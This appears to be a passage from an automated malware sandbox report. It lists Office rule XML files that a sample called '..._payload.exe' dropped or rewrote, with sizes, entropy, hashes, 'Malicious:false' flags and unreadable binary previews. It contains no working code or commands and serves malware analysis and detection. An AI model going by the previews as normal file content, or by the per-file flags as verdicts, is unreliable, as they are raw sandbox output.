                                                                                                                          Preview:<?xmla..wVd..`..)....M/c."!...Eqdl&n...l.iE/|..:.ES.u.Z...........~5...}.X.d.&q...I6.U3..K..%.....B..$x{@..5........{........d./.. ......y.l......Y.......}G:BO....O.....W.....1.z.....f?.kl.......].mX....5:.,..o.....~.$.....U..4.8.&.P.es......+...........W...'B<..e.......L.f..E{.c..d.R.p..I.Z..bg........o..|..7Y......-.. .tc.A;..=x......i"3......Yj..?G.P..%)...s.'P....i...\d.u.F.)QA..5.../.D.03.W.B..b.@..209+=...N......Ps..q..d_.{.Q,xTS.....B.....X....m3@.d..@._V2.c.&.ys.vw.;I.Ok.!.7.....;D.d~F ..x.........c[{%._.?f..W}U....B..$..}k..5...-....lM..g...|...B...n@.1.AYy/.w....r< b.7...y.....p.y.X5:...N.a=...n..p.KJ.]k.....g.~....k.rvF...FuJQK..L./]......M.3e...g...BqK..6U.=-..7M@V.;q.G5#...`.T.g'.Q%d.............L.By...Y.Q...kq8.q.z..R.!."..o".-Akn.G}O.Y....$.q......*I.F+5R../.@.>......c.:.6p.z.>.S.AJ.(/U.s:.-...~..|....j:.l.m.F..=<U~...3..IK[.`.f......E.6.F......Vt...3..~....3&.....H..d....4...[.$.A=....}D...+..t.@>Bl......b... ..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702101v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1741
                                                                                                                          Entropy (8bit):7.889140690263089
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:PPHDQOs7QyRGp0WH5jF03qK0IjpvG3luErwsyb3IlKHU71HMD:XzIQcYvHdwIluErw53wKH9
                                                                                                                          MD5:78C8D92A42852D87333DC7EE3B81E596
                                                                                                                          SHA1:7BB985CD732283548AABDB3A70BB2413BB606CCC
                                                                                                                          SHA-256:8529AAFF952F663322D18E902F5BBD1B1B0651A19D8CF9286E32A05FF9DB9E0A
                                                                                                                          SHA-512:FA25698984F982559F915E2983CDAEC6ED642C1AFC312DC90A4576BB4DE8C8D5139266274CC66FABBB20584BA529DE902E8E67BA883C3721820FC6B612897CD0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...kb..K...).C...;...[x....$.w.....1..c.......6..7..@....Rr..6]....5..4p.JP.'.-..]?.i..4>4....[r-..J?..%..]..;....;^S...~...@?.?NW6.W.G....#...3.J2.VN.7X.H.GF.......2.!.....<.YU.....h.;a..Qb.....Vw.....kh..r.]...n.b..5d.y?.0..S..>."d7)M....(...H#...s.....%Q.e..T....r.F..l....s...W.q.....YG..[.}sH.....8......I`.m6dQ..;.(...X.4i....4)...@.U.......2.k.1..Z-..GcI....Q.......K5..].c+.......DR....| x...Z..f...g...=............Z.az,.M.A3.&.....3N...*...RbN......M=..H.4~..$.$.ej[.E.\.Z$o.>'.v:..N[.vn....f.N2P..$..9O...&.....n..U.J.iG..8h.r/l@4.I5.$...".n.z1..e.H..S"8...N~.....;.a<2.v...2....f.0..w*V..s....9,U`+/.Z..7....f.s......|..;...}2...-!;..'......S/-.=.....p..v.I@......z%.....;.R.L.&#...J..k..Wn.l........2T...?r...a..a..U.{j..3...-..}..(.?..Z....`..Y..6=...u...N...+....u.~..wy.i..........$S...\]\.v...e..8..:..?.....f\C@U..;.6W..=...]...C....[..r.-.......|...N.Hl.xY)Z.ye.....V.,.7........V.a.$...c,....6A.Z..Q.d..Q..%.`PV..w...xF.Vr..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702150v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1693
                                                                                                                          Entropy (8bit):7.8753995426135575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:sWCffL7jIhjTcBi0rS5hGxAoEyyXbcF+Sc7izcGD:sWCHLwkrgxoEy+HSSM
                                                                                                                          MD5:B3426EAB904B7690B9201DABC5768A81
                                                                                                                          SHA1:D2F334F9692B721B91D38048C98E28EE0E969251
                                                                                                                          SHA-256:48F4EA136E0874B38C08A27641732B11EA043911593E5B92415325C851D600F1
                                                                                                                          SHA-512:DB42DC816FE9FA1855D37BC466C35F942E8185D2EF91D203B130FDA1BD1ED5A0A86C39AFA04567CC416ECB874FE6631CE2D9514D0CCC12068B47CFF155BC8D37
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.l.S8..W..HK..... Q.0.X...|...B|d..FO........N....._....:'Y.S....p|>,..+.=......l.P..`..e.F.b.VVcE..dE=......>pt...U..{..,?>..%R}...T.#.c...M...#Y..=.-....c..p.....A.....'L...}..T..5X%W.%bW...#..S...LP..O%...@...y.....=.t.m....'..p#|J..%N.....V$..3..5....g..H.H.o....h.....V.Vvy.iR@...P.Q,MK..._C...E.3(...s...49..V....I...p../u.&\...K;..r.xlzR...o;.6/..`..hN{... .>Y..;C........!...z........0...4..'......G.....h.C4....eh....N.C+..h.+`..f.?0m.>.X..O.N.g[.>;U..9....D=cc.+.".Ta?..l,.I...q....j.R.r.LB.XY.$N.t{.B..3............v...O.....^O.L.P.$....7..s.T.....~.8....0.6!n....6cN.X.E.U.+sI...I..A...w=....c....v.bB.@8n-........O.>p..HW..y.....2...r..#1.%.b[......r.3.l...../0...p%.U............c.[.DHz..;{x.9...zJ..I...T6.. ..P. ...F.-........f~...qW.....q....\AW...~.....fX6_LwY.z..Z......;...Uq_...;F.Y=.9.\"+t..P...>...#...t.JHr..O...N....]xW.!M3...5.u..R.;yG..{.^....2...k.n6..-...&G.!A.Xe......S.MX.Q.....1.g....\....e(.F.[.;r.....5....aW...>!W`.7.J.M

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702151v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1730
                                                                                                                          Entropy (8bit):7.884874540107101
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:R7jYrpqTTwAaOg0eRP5TntfOQuqqgoVgS55k5wJiPD:5IIHwVOjWPrbJoes5iwIb
                                                                                                                          MD5:EBE36162FD021C2FFABB1007D70EB66B
                                                                                                                          SHA1:E62CBA0E6E20F2A164B936036158CACAB9C62A0F
                                                                                                                          SHA-256:D7DC04ACD94D366CCD822D721B6FE167812506B18FB194BABA674CE197DD4167
                                                                                                                          SHA-512:044A97383FC156AF664D1DCE32E6B7DB627BD9A22BBB789DFF20DCB141A54D29E30CC683C5F3D63950CFC19BA4DC639FC1A0B01A086B37645A91AB7B568623AE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml'...r...#3....l.Y..2.a.b...72.c*l...{.V.%..\y.6g.|oz.......$"..|..h`W4.6..b..v8..';.~.t.)[.:8.......y...m.........GH.FD..@9wD...._h....v..?Z.b.....:.Ud2...Y.Wo$.....6....t|j....M..yF+.)....7.H'{..`..a[;....B.......|e..#.C..|.].....r".BW.....{.....5......P...&.5.U..V .sB..^.Ej..a...x.{,vm.7.s.._..N.....=..x...o..6N{L`qX..hd...T.N.)...0..9../...8..B.....H8.&(.l/u"{ZVJ.[..]D..o.!sH......v...u...X.c..ou...x..:Y.I]....8....K^... ...q.D...........&..y..x..3.<.x.=.@.....VB...].o...../.OR.Y-.1z.........w..#^@......n..`.`.d)......r......?fEO..e.[.t...Y/.m+...u...u&.........&.B.`..Fv0{...k.I.l..(..j.j._..r.!.^.5.2........r.L.....Icg.S....5..C5[.....Z.(lt...>.;...w..l.7...'.O.....i.r....:....q.U.= ..`U.{.).4+x.+..L...4.G..X..'-....m>!....I....z..-...N.........}..1X.K..&Z.J..VBpt..^..&.?.(.{2....."..|W...aa._.l....F.c.q.S*..0#....d..u...E.......l..t......|rO...........d,......A.....4O....im..WK.[.....@..^..M+-....Sr.'....7I.W..,./3.RC.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702200v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1693
                                                                                                                          Entropy (8bit):7.87508103993315
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:uh/Yb8lAKPaOi/459x1cjH4i5r+L16S1FXzpvBRwu4UnhaPzunAvGO+zEte0bD:uFlgOFUcmqL3zV7wkalRReeD
                                                                                                                          MD5:29C0FCD56AD3DD14C51774150EC143BA
                                                                                                                          SHA1:7E6E75A14BBF0A9CB667CD9EA5A42F0781975E46
                                                                                                                          SHA-256:0CBCB57750E704F60B91EFDE54128EE47CE4AC99DBAF4710B3FC6A80A801CFA6
                                                                                                                          SHA-512:A5E89CE3E84D214A753505B33514EF565E70BCF03F9E8642EA37C727483693303646376335280CD07BF952B41E59294F472160EF026DB16F6D48C70DACA2A66C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.W.?...h...G.k.......x...qH...r".!.'k..>..K.>.%Qi....E.j..j..V.x.ky...l..q.S..>..<...u..$...)..~.......D.."q..&..F..CmS...I+s}M.m.t(.....S.:.#.E|..._..<.x...=d.....F..$.P....O..$Ve....H6..X;..y.I....Ymj..3*....lcIN1..6v$...z...sul..K.g....lu.P29.a.._X...}.......r....!h.9.....e.O4..5..>....+....D..k.1...)3.y)..X....M..:..B...G.).Y..... ...@.G....E..'......RT...2.2.i.@X...MQ........h.....g......4&.EPL.}.T...Wf.0...cD..h...x.u...6a.+...7.e..:.Ew.....!t.T.?0#..&().....L.@(...{...1H..<...Xw..;..Wf.U....o..OE`vP.0....i.Fq..K;.>^..L.!k../C.o#..Z.fs...r7.K.4&....&..h/.'.....^...%;..'..\0.3>$....OI..D'8w.D.r....U^.uw..cT[./.eQ..$.`^k....%i...z. .Y.iM...2.[....9..y.b.f.-L.Z{.r...2.&....M..>.u....=}..O....\.D....A..W..Jb!%....K.... m._.*. Bd....i.3ZX....3Q...e.>[.sV.W1..n.I...l.<.xu@0....j.F.5..f.!.8..w.........)@.A.....sO.BsA.r..ou...QZ}.!.v..g.?<'c...s..g.$.p...l...@..j...W.;@=}..L...".AON$..A[...)..}tw).....b...'!.w.JV.^..Y.. B.....1....A.V.*.k

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702201v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1730
                                                                                                                          Entropy (8bit):7.886592063672432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:et/+YhqLpt/PaQScX5+WnLHNizBaHBeCVw7tTR5BuwDTV/A8O5/RMc0j/+i4Atn+:o+7FPx8V6BeCyJR50cRAlWcWDaD
                                                                                                                          MD5:9E1480C2A06E4073CD5C71B986BA081C
                                                                                                                          SHA1:B5882E6CCA1B96F41FE657138D77239E208BA2D0
                                                                                                                          SHA-256:DA9F2EC5671D4C19A4220A9442BB7CE87398218FA6B064451EA7CBC26D880E99
                                                                                                                          SHA-512:6F68A7F237A817B1DDD7D44884D4AA2522938DBD99656C23324D1E26285A4338C338DEBC4FF452DC64669198DEB346A8522CE105355F3D84B998EE70BC9D0F32
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......<...$..../8.o#o}V....s..JV...l=2.r.0..N.......Uh.D.^.. ..NkX..!.:....[[.1.hpbt. mLy..rB.FN7-...}...f_.m...7.@...5.bk.3n..W..x_..c'...f. ..o8T.c...To..?TY......8.V>....^.F....w...H.4...!#.;wL..b)z.z...)..z.X/.C@L.......M...P.zS,........ ..DGj..........Y] 9..B........U........1.]...=.@..Y....X\....M>...m_Z?.b..F;47.p.hba.J...).;.!(..d...KLm.9-.yQ.f(.b..E_f.Zgu...ax.....r...K.P........Gz.i.].Tb.{~...b9.'..B.i.9.9...>.8o.zr...{.^..w.CNe..;.....0B{VdQ..A..>:...x:........l.....;...i.i_.a..c...Yw....z.R'.....Vvb^&..K-B...(p:N.@...i...}.p..m8 .Z...P.M..FN..=.......}.%.f%t.O..z...._.o..;...7>k......q~.x._p..]h&......._......S.d=...|..B....-............@K.&..h.....ri8. ...PmW.......2O.Uy....a...p_U..&1G.G......QM..p..hE......qe.W..BM.o...D.D..x.C.~.W.8$O.?......K.B..V7..t./r....V..;..B.]W:N.J...>.D..F.>N.....S..c.).BQ...<_..J......$z...`..X.G.....I^.t.`..Io..7...N...x..c......% .......r....L..MZC>K..+.el..!....s..bp..a.....ins.p..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702250v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1685
                                                                                                                          Entropy (8bit):7.892475781313294
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:QyGnzTTtG98DBa2C2k0pZl+B38w6XcpV7zw5s0apAdxbN2akf9ovgzsaDbOdKFPX:Qymvp3hp6BFzw5sjp0bNoqozsaDKdID
                                                                                                                          MD5:22721BB304F93A14E08930961E5B30DE
                                                                                                                          SHA1:1B6557E907D7892BB552B5EDDD608A4621C2F7E7
                                                                                                                          SHA-256:DFC1E248DCD76E5215C718943A7710C6BC55E291163DFE8097B88E59B30BBBA3
                                                                                                                          SHA-512:A31F837843428D994A293C27FD0ED14342CDDB949DE55EF240BC0186E0705FA86F579E9961701791F42919D98A29322716A695BD8DA0C7BC7DBE37E3B628CE26
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml-..J...u/=W.*...1.....]..x.86.=&F.c.pa.5(./MH...w....6/....Q..H....m.r.3.:.x.{..B..TuB~...%bz...P. .<0...F}.V/W.N!..#`o;%p-....}\.=M...F...2.J.j...1u..EH\...Y....h.D..[O.T.Jve.k.....0..o...B@...l.........w.F+.K.6F.?//.i.i.t....qw......u.IZqK........u%....!.....\Rfba.56.t\we7..K...uk......l../.K.'[..AK`..+y p...=/....z.d.i......C....!p/K=...Q...CpgF...{.A.Zq...a^F.......-.O...qH*..s=...q'...]..]......A5&>.\g...#...@.nS..6`K...D=A.D.4..J'.b-.......:.s).}..x.S........#.;.....%..4.....g.Hko3..+....H..zZ.m.,........x.....S..].F..`p2.m..C.........E../H....W..}W+Z%..wj...f.......f...L/...h*..............'........E)1gE..-F.L...^s.Z..j6H.B'.u.......6:.a..... ......U...G....Cyp.pV.[...P.N.."...Q..v.......r.Ad|.E.I.%.}...Z.m.......4...i.s0......"..2.......s..E7.v....%P...'.......AQW....,.#/.u..M+."...72...._.n$../...Rl0..X.`o.*,...S...:.....c.P.4.|...f.7....6.|y..-W...`....c..!.............=.8...H.9.$..j...E..N..(.....F.)..9vv..i.0...4..Xn.^S..l

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702251v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1722
                                                                                                                          Entropy (8bit):7.856067803383513
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8cNuq7pfqXb/2nuK8HvlkBY6/0D+b4ztRTQD:XB7sbeuyBY406bat1M
                                                                                                                          MD5:329106B8AA80702AF30312E6ECC8963B
                                                                                                                          SHA1:F794DBAF2E642208B08EF58D63D436A017EBB9CD
                                                                                                                          SHA-256:3B2AE57464C602BA55F5F7E9390A6EF7C166C505D456D8DA99D3AE3CF7422B87
                                                                                                                          SHA-512:F7E76288E629F1B809AEFC951AFAB88997AD47D5A273A484232A2CEC220D4764FA770B844FBCADE154B0E103D0A9E76D33205142784FD329F26CE758D1025D0B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....\..+@.{Q....f...Q....Hx.E.U...n.zV..O..q.^+..?.&R.-X.1.P"..&H..........!._[0s1.t.......A.?.G.lf..w...*.e.....x.n...uo..e.......&...5..E-..3@..@z.b..ef.4t .l.g.*..`...]...6.q..p4......;..%.J6-<~.h.R=.'.....R'....&..!.!...k!...._.E...R.m;....E....L$.Rpy..#Q.......R.o.J..;..5Q.RY5f'.4.q.....6.-d..@..a.d.r....).G.6^.#.M.Y.1.f@.<...s....K.'...gs.Wr.Z!..W........E.U.\~x.>...K.D&J.a.B.....,..O..3J.CO.s..H...y..Th........m....D1....N...r..(..2...6....8F..e..M.@6....ED...^.y...pP..W&F)....X<....D|Y+.Y..Z...}.X....]..g.T....pII.........\.F.._.'.....'T...c....F..]U.)c.D].}UXk..p`..'m....mLGWc...^..J........h.....cb`p.....$.'.)...N^jY.........^...^h....[b.gH......o;x.C..WR.K.t..P!..M..gUT.M.s.....URR.B..t.......=.z.K..eN..s.#.....Y.$..N...6k...0a....F.g.`x..G$4Y......uq.b$.&..<.tbT..v.v...QA,.SEA<c-..7.\...0B....I.l.<.(.h. G.9.dm.....w..._.kZ..}J.U......S~.Y...%.!+.."......t.&....e....q..>....=<>IL........."|7`.PIN..Y..\.C.I,..z..j...*..J:

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702300v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1695
                                                                                                                          Entropy (8bit):7.871625184869186
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:HS9N8bAlPtL6/wrLx+eeWxVeBRZj2LtcxOewUD:HS30AfhrVi6VeRZj2qxOG
                                                                                                                          MD5:376E9C6AED20CB3882AC76ED0A36A3B4
                                                                                                                          SHA1:E010BE42AF2A1C67C5E8CE7A03004083704B377B
                                                                                                                          SHA-256:3F99AEF3EAFF038202986E2DDBD8855D8765E40EEAA3C5441E4C21FF52ED9B14
                                                                                                                          SHA-512:E09D6B150D6548CD542E0AEA804280F0A6A8955BB98562894F2DCE3B57AC7607FDBC67100DA42E42A49EFED8237476ACD5A3DFE4228B4F150BC23761328771B4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlH....;..A^.Qi..[.Dt.%..[~.*...:....s....*..O;t/.....]4Y....+..E.8q6...I.0f...5m..n.I..3GW..]E..=u..c~2y;...`.....,.'/.G..6.%x.>+o..i..#...OV.j...K..R....z....46.|....C+.~.(.B..D.W`..t.W?.,..qzgu.OMc4.&M...l.}..G...$..?.Y..D."K...Bt.&...p..|0..4......U....p.~..*.A..........aO.l..hM..W~..uW...........C../...t...(....W.......R.VVV..._...G...7....L[...j"L.....U.W.]../.i.....w..bp.-.Z..(..e.v.>.'O\v.$O...1.-..#...=.`...>.rZ6t..b.....k.#X5]y,6..`.j.\./......._.C.p..Qk.:x.......8D..H5.4.&l..L....P....-.}x...8=...{&4Ix..aL.[..(..c..vt..%>.....,..1...k. ....,..G.C...&49..g..0J..W.U....hoah.OB..p....I...G.Q..........W.2.S..?...`u....&.A>#u[`.5...b..c7..^...Za.+.;g.{..]...j.6.}..p..?."=I.^..}3.J.c..:......)....5........x%..n.>...2.a.A......X...[..........y...o.kN.O<..<'.`.|j.....g.?J.&V..ici.....cd...e.4.].....0.!.e..U./V|....wCoo&G.........X>@D.......)....C.X...U.......W.'.(2u.........%f.I.. ....w......3..f....>r.).,..u.........UU>u.......-.ky.....F..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702301v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1732
                                                                                                                          Entropy (8bit):7.889031812171546
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ePTiY9h2w8wXM9WJ1s2aad+y73klMk2SmnkqoYvydglIVOHD:4BhYSM9G1s29t7Jk2SUkCadUsOj
                                                                                                                          MD5:0A1F36A14CF497ACA92C04D4769B197A
                                                                                                                          SHA1:05ED409CAC9FD20EF76DFA2D6C2D077F5E2126D0
                                                                                                                          SHA-256:BD05A94F585C5833D56099AF56B2BAF7A17A79DC4C7D36331304761BBFFE721C
                                                                                                                          SHA-512:D33807621EE121F9F542DA9BCB0A4CE45F01DDBD870C844D3540C12491D32145519B778E7F0647C42BAD6C58A7582F225DEC92BE35BEA59194CCD20F31797594
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.4i.;......._'.=....../...5..2.O..0.e..m....giq.....G.....@...V. .....b....]..R.A.t#...L....T&J4'..-49.........NH.i...L..Jio b.6..MT....s..h@.... ..(.6..I.Og..e.y..c...b...x.W..+...,/.._.KM!'og.$..hbFXY.s.!$.(...{L....X.A.....A).p.5V1D.3}.Ic..>....&.v.3.......:...d...Qmjx...'._.ld.OGN..1.Y.%.L.\l...T..[.....#".!.R..w]1.8.\^6..x.5...-.....@.mB..P.D.$.]o.Y._.svKa..w./.e8...LB7.l..d....l*.9s...=...1A^)o..........04^.L..Qf....a.....~:.G.;.......57x..J5..@.a.....O.U..w..H#..Z.|.0..F7x>......g....X..(e.,..a.d.aI...d.K.a...OZ.Xh.R.p.....(.p.[m.....%...w.j..."..\.....h.......:..<.....+..u.........b.RN1.d.!.W...Q....v=2....h.g.%....~V...q....j..}.....#..{y.....2.`...@9.........C+R.....`..0..%...F.}..gr....q.'......^$..-...3...:.P!....#a.g.?.B....q.....Q....f....%.F.}z.......GKZ..B....NM6.X9......O~l.%....(..\.....b.K.[...DiB.....\...(B\~.'g1.c.E.M..r.V..I....=svS..O.....]ue..P..A..@ap.V..i...{..A..<....k.1?.^..J......cd...Gb...f..%...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702350v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1691
                                                                                                                          Entropy (8bit):7.86588420677882
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:QhDLP7G+ghxrLtUz/MPe7sdMPdw+DT1SBLJGkD:QxLtixGgfMPdw+HiLJ/
                                                                                                                          MD5:3F4751EB6BBB49E34588FB8A76FDFC46
                                                                                                                          SHA1:E856C50B0B06360735784B7A3E1C53591091BE17
                                                                                                                          SHA-256:9C40C3C42623CBB45B6738620DA785F0FF3DC28C15D475DA3AC3895ACD6C2B42
                                                                                                                          SHA-512:C1385DE2095198E4A8B0BBCAB9EBFED58B59F66E6823792AEF5A0287214BC24B31CDD0A4B36C2952DA668ACC3D6234AE09CC14D3412E98F7FA0571173D33FF94
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlm.;.j.9.O.....A..:.^...b.....m\.>...n.7....{...^.....p$.b_....Q...$..P......f3B.ZDl.o... 6..h.....X.u.H..E0.v..Tc....>t.h...2.....`.b..~D.JS.4.....&..L.i.Ee7.~k...T.....HO4..p..k..n..N......B..u.bY.L...8.N$..Kj...K.........n)...h..2.R...)...o...UC#%d..k....h..t.....$...B.$.d.ZR#).MB.I.e9..!.y.....o..u..v4.z{.;ymk.....`.*h.y......v..2.`1X......D..F..Uv..8.#...x...u.I..3.....bR.H6....P..d....0_.Z...}.!..e*:....p[5..@.....<8ru{.ad.....s.K.....7...WF...xw_..E.ZL#U.t.....L9..V...fX .z....R.w.|.y"...\s..m&.b.((xA...v.Y...."h.C......k....".5...^.S..#.....-E..>.E.%|..R.}.a.D.....'s..{....3o............Z!.q...)...` `.[..e`1).g...o.....=RV.7..1<......:U(..c.Tj..F.\).00._.0.yAq.....c`.9.L....8..z...8..F.U.........fY.2KF.f.m4..../\G.k....Y".n....2.....[.[bH..J....,......\.cB..._n.,..Pzd.j.cn.z"...o..k"..2h3).]....0......K.ZX.Z).rT...3u..k..p.b..,._... 1..M....bd}...eL;...gq......t.`DE.|.....6.....c..^s6...eMzz....v...!.,...2..E|I.e.y0.j$....$....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702351v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1728
                                                                                                                          Entropy (8bit):7.889882535945721
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:x2qeYyqfxno8O/WwKifUaNjQ+keQfD7bvzhPr1cSNQ8FHU5mMpvc0zuVbD:x3yqfxnrOu9aWVeQrjcaQ8F+Ja0ED
                                                                                                                          MD5:17C0D7F3C2A7526C862E522F61A561F9
                                                                                                                          SHA1:2DA29C8D2A6440D3D68B42F41B1704A688D6E50F
                                                                                                                          SHA-256:C53A5C2B7E823A87470B231649EE7FDEA1F8FC6190684AD727FE22A91DE0E687
                                                                                                                          SHA-512:D0EA456B73367CB7125E6080B3A74CE975A7C17E7E0D7AA0D5104CF03C7940AB7D74776F341F3A6AAC65CDA92BD2EABDD682F805D8E0422FCFC0F33440108E52
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....{(.^x..=....k.. 1Zu;.|..*..!4.~\..QzB..O.ZK..m..fkK..-.0Rb@...Wd...a.lr.%...0A(T..a...A.R..-...bN.^%.i..[).p......I....F.......Uw.....U....V....b.U.....l...a..v}M.o999kc..o.i.s.....2k..S.{. .F......7.w....g.0\*@...rMQ...7;OX.....(q..$.9..y...I.lg;'.k.........u.!..5a/<.d.$.;.....H.....dOE..7[...yQ@..rv...Q.G.@(.#.......(.t<...j.8..M,hP..d..!.F.R.....4..'w...(.)..@...~7C..&.Y...1.[...#..pN..a6..N^&............).a.B_.1hW!.<...A.t...-.G..|JO..../.[......D3..'e.C..X.G.r...m...m....0N|%.<.......!.......D...>....E.1........6..U..t.[.lV.........]...jXX..j..de...e.&(..$].........5.....\..R.7......-.v...j.Q.;........i..Ue..)r.T..1W...6.....L..<......../. ..=.V.z....A...r.S..S.....).<.k.O'b I;*KD.Yw,..M....4.g.+...`N^..9.Z.....[...mV.8Id..x.(.-.fL9.jR.>;....z.." a..L......p.E.Wa..}V....7..J.GB.....8.9.......[D...Z..k....|...T=.>.....G.o.;T.2..,.......P..F....q..X.z.e..U.TZ%$#.w...a!..|.&.b...DB=.O...L.T..&..3./q..".D.`......,d.[[+..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702400v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1701
                                                                                                                          Entropy (8bit):7.874838557004507
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:BXEKLx+7zt0irerSk23TocUAt2kZI8fC1CxGKyqD:WQx+7h3bkqp8kZpC8n
                                                                                                                          MD5:92D6A02B1C6C5EBE45FAE786D5D973B4
                                                                                                                          SHA1:8EB63A29F26165BB37DB55EB4F7A6E09D235A4A7
                                                                                                                          SHA-256:0FF52D778712FB86683ABC7E673DF0C8E61D1058BDD2BA31DAF215860000DDB5
                                                                                                                          SHA-512:C67CEC4ADDF0B28E0FE94FE6C0C156E4EEDFC78507F1F22BD984F4E727CD58F78D34713A689A99A2DC74FF7C48CF3BEA7889F4022E7EDABF4E4379D6DC1D0F2E
                                                                                                                          Malicious:false
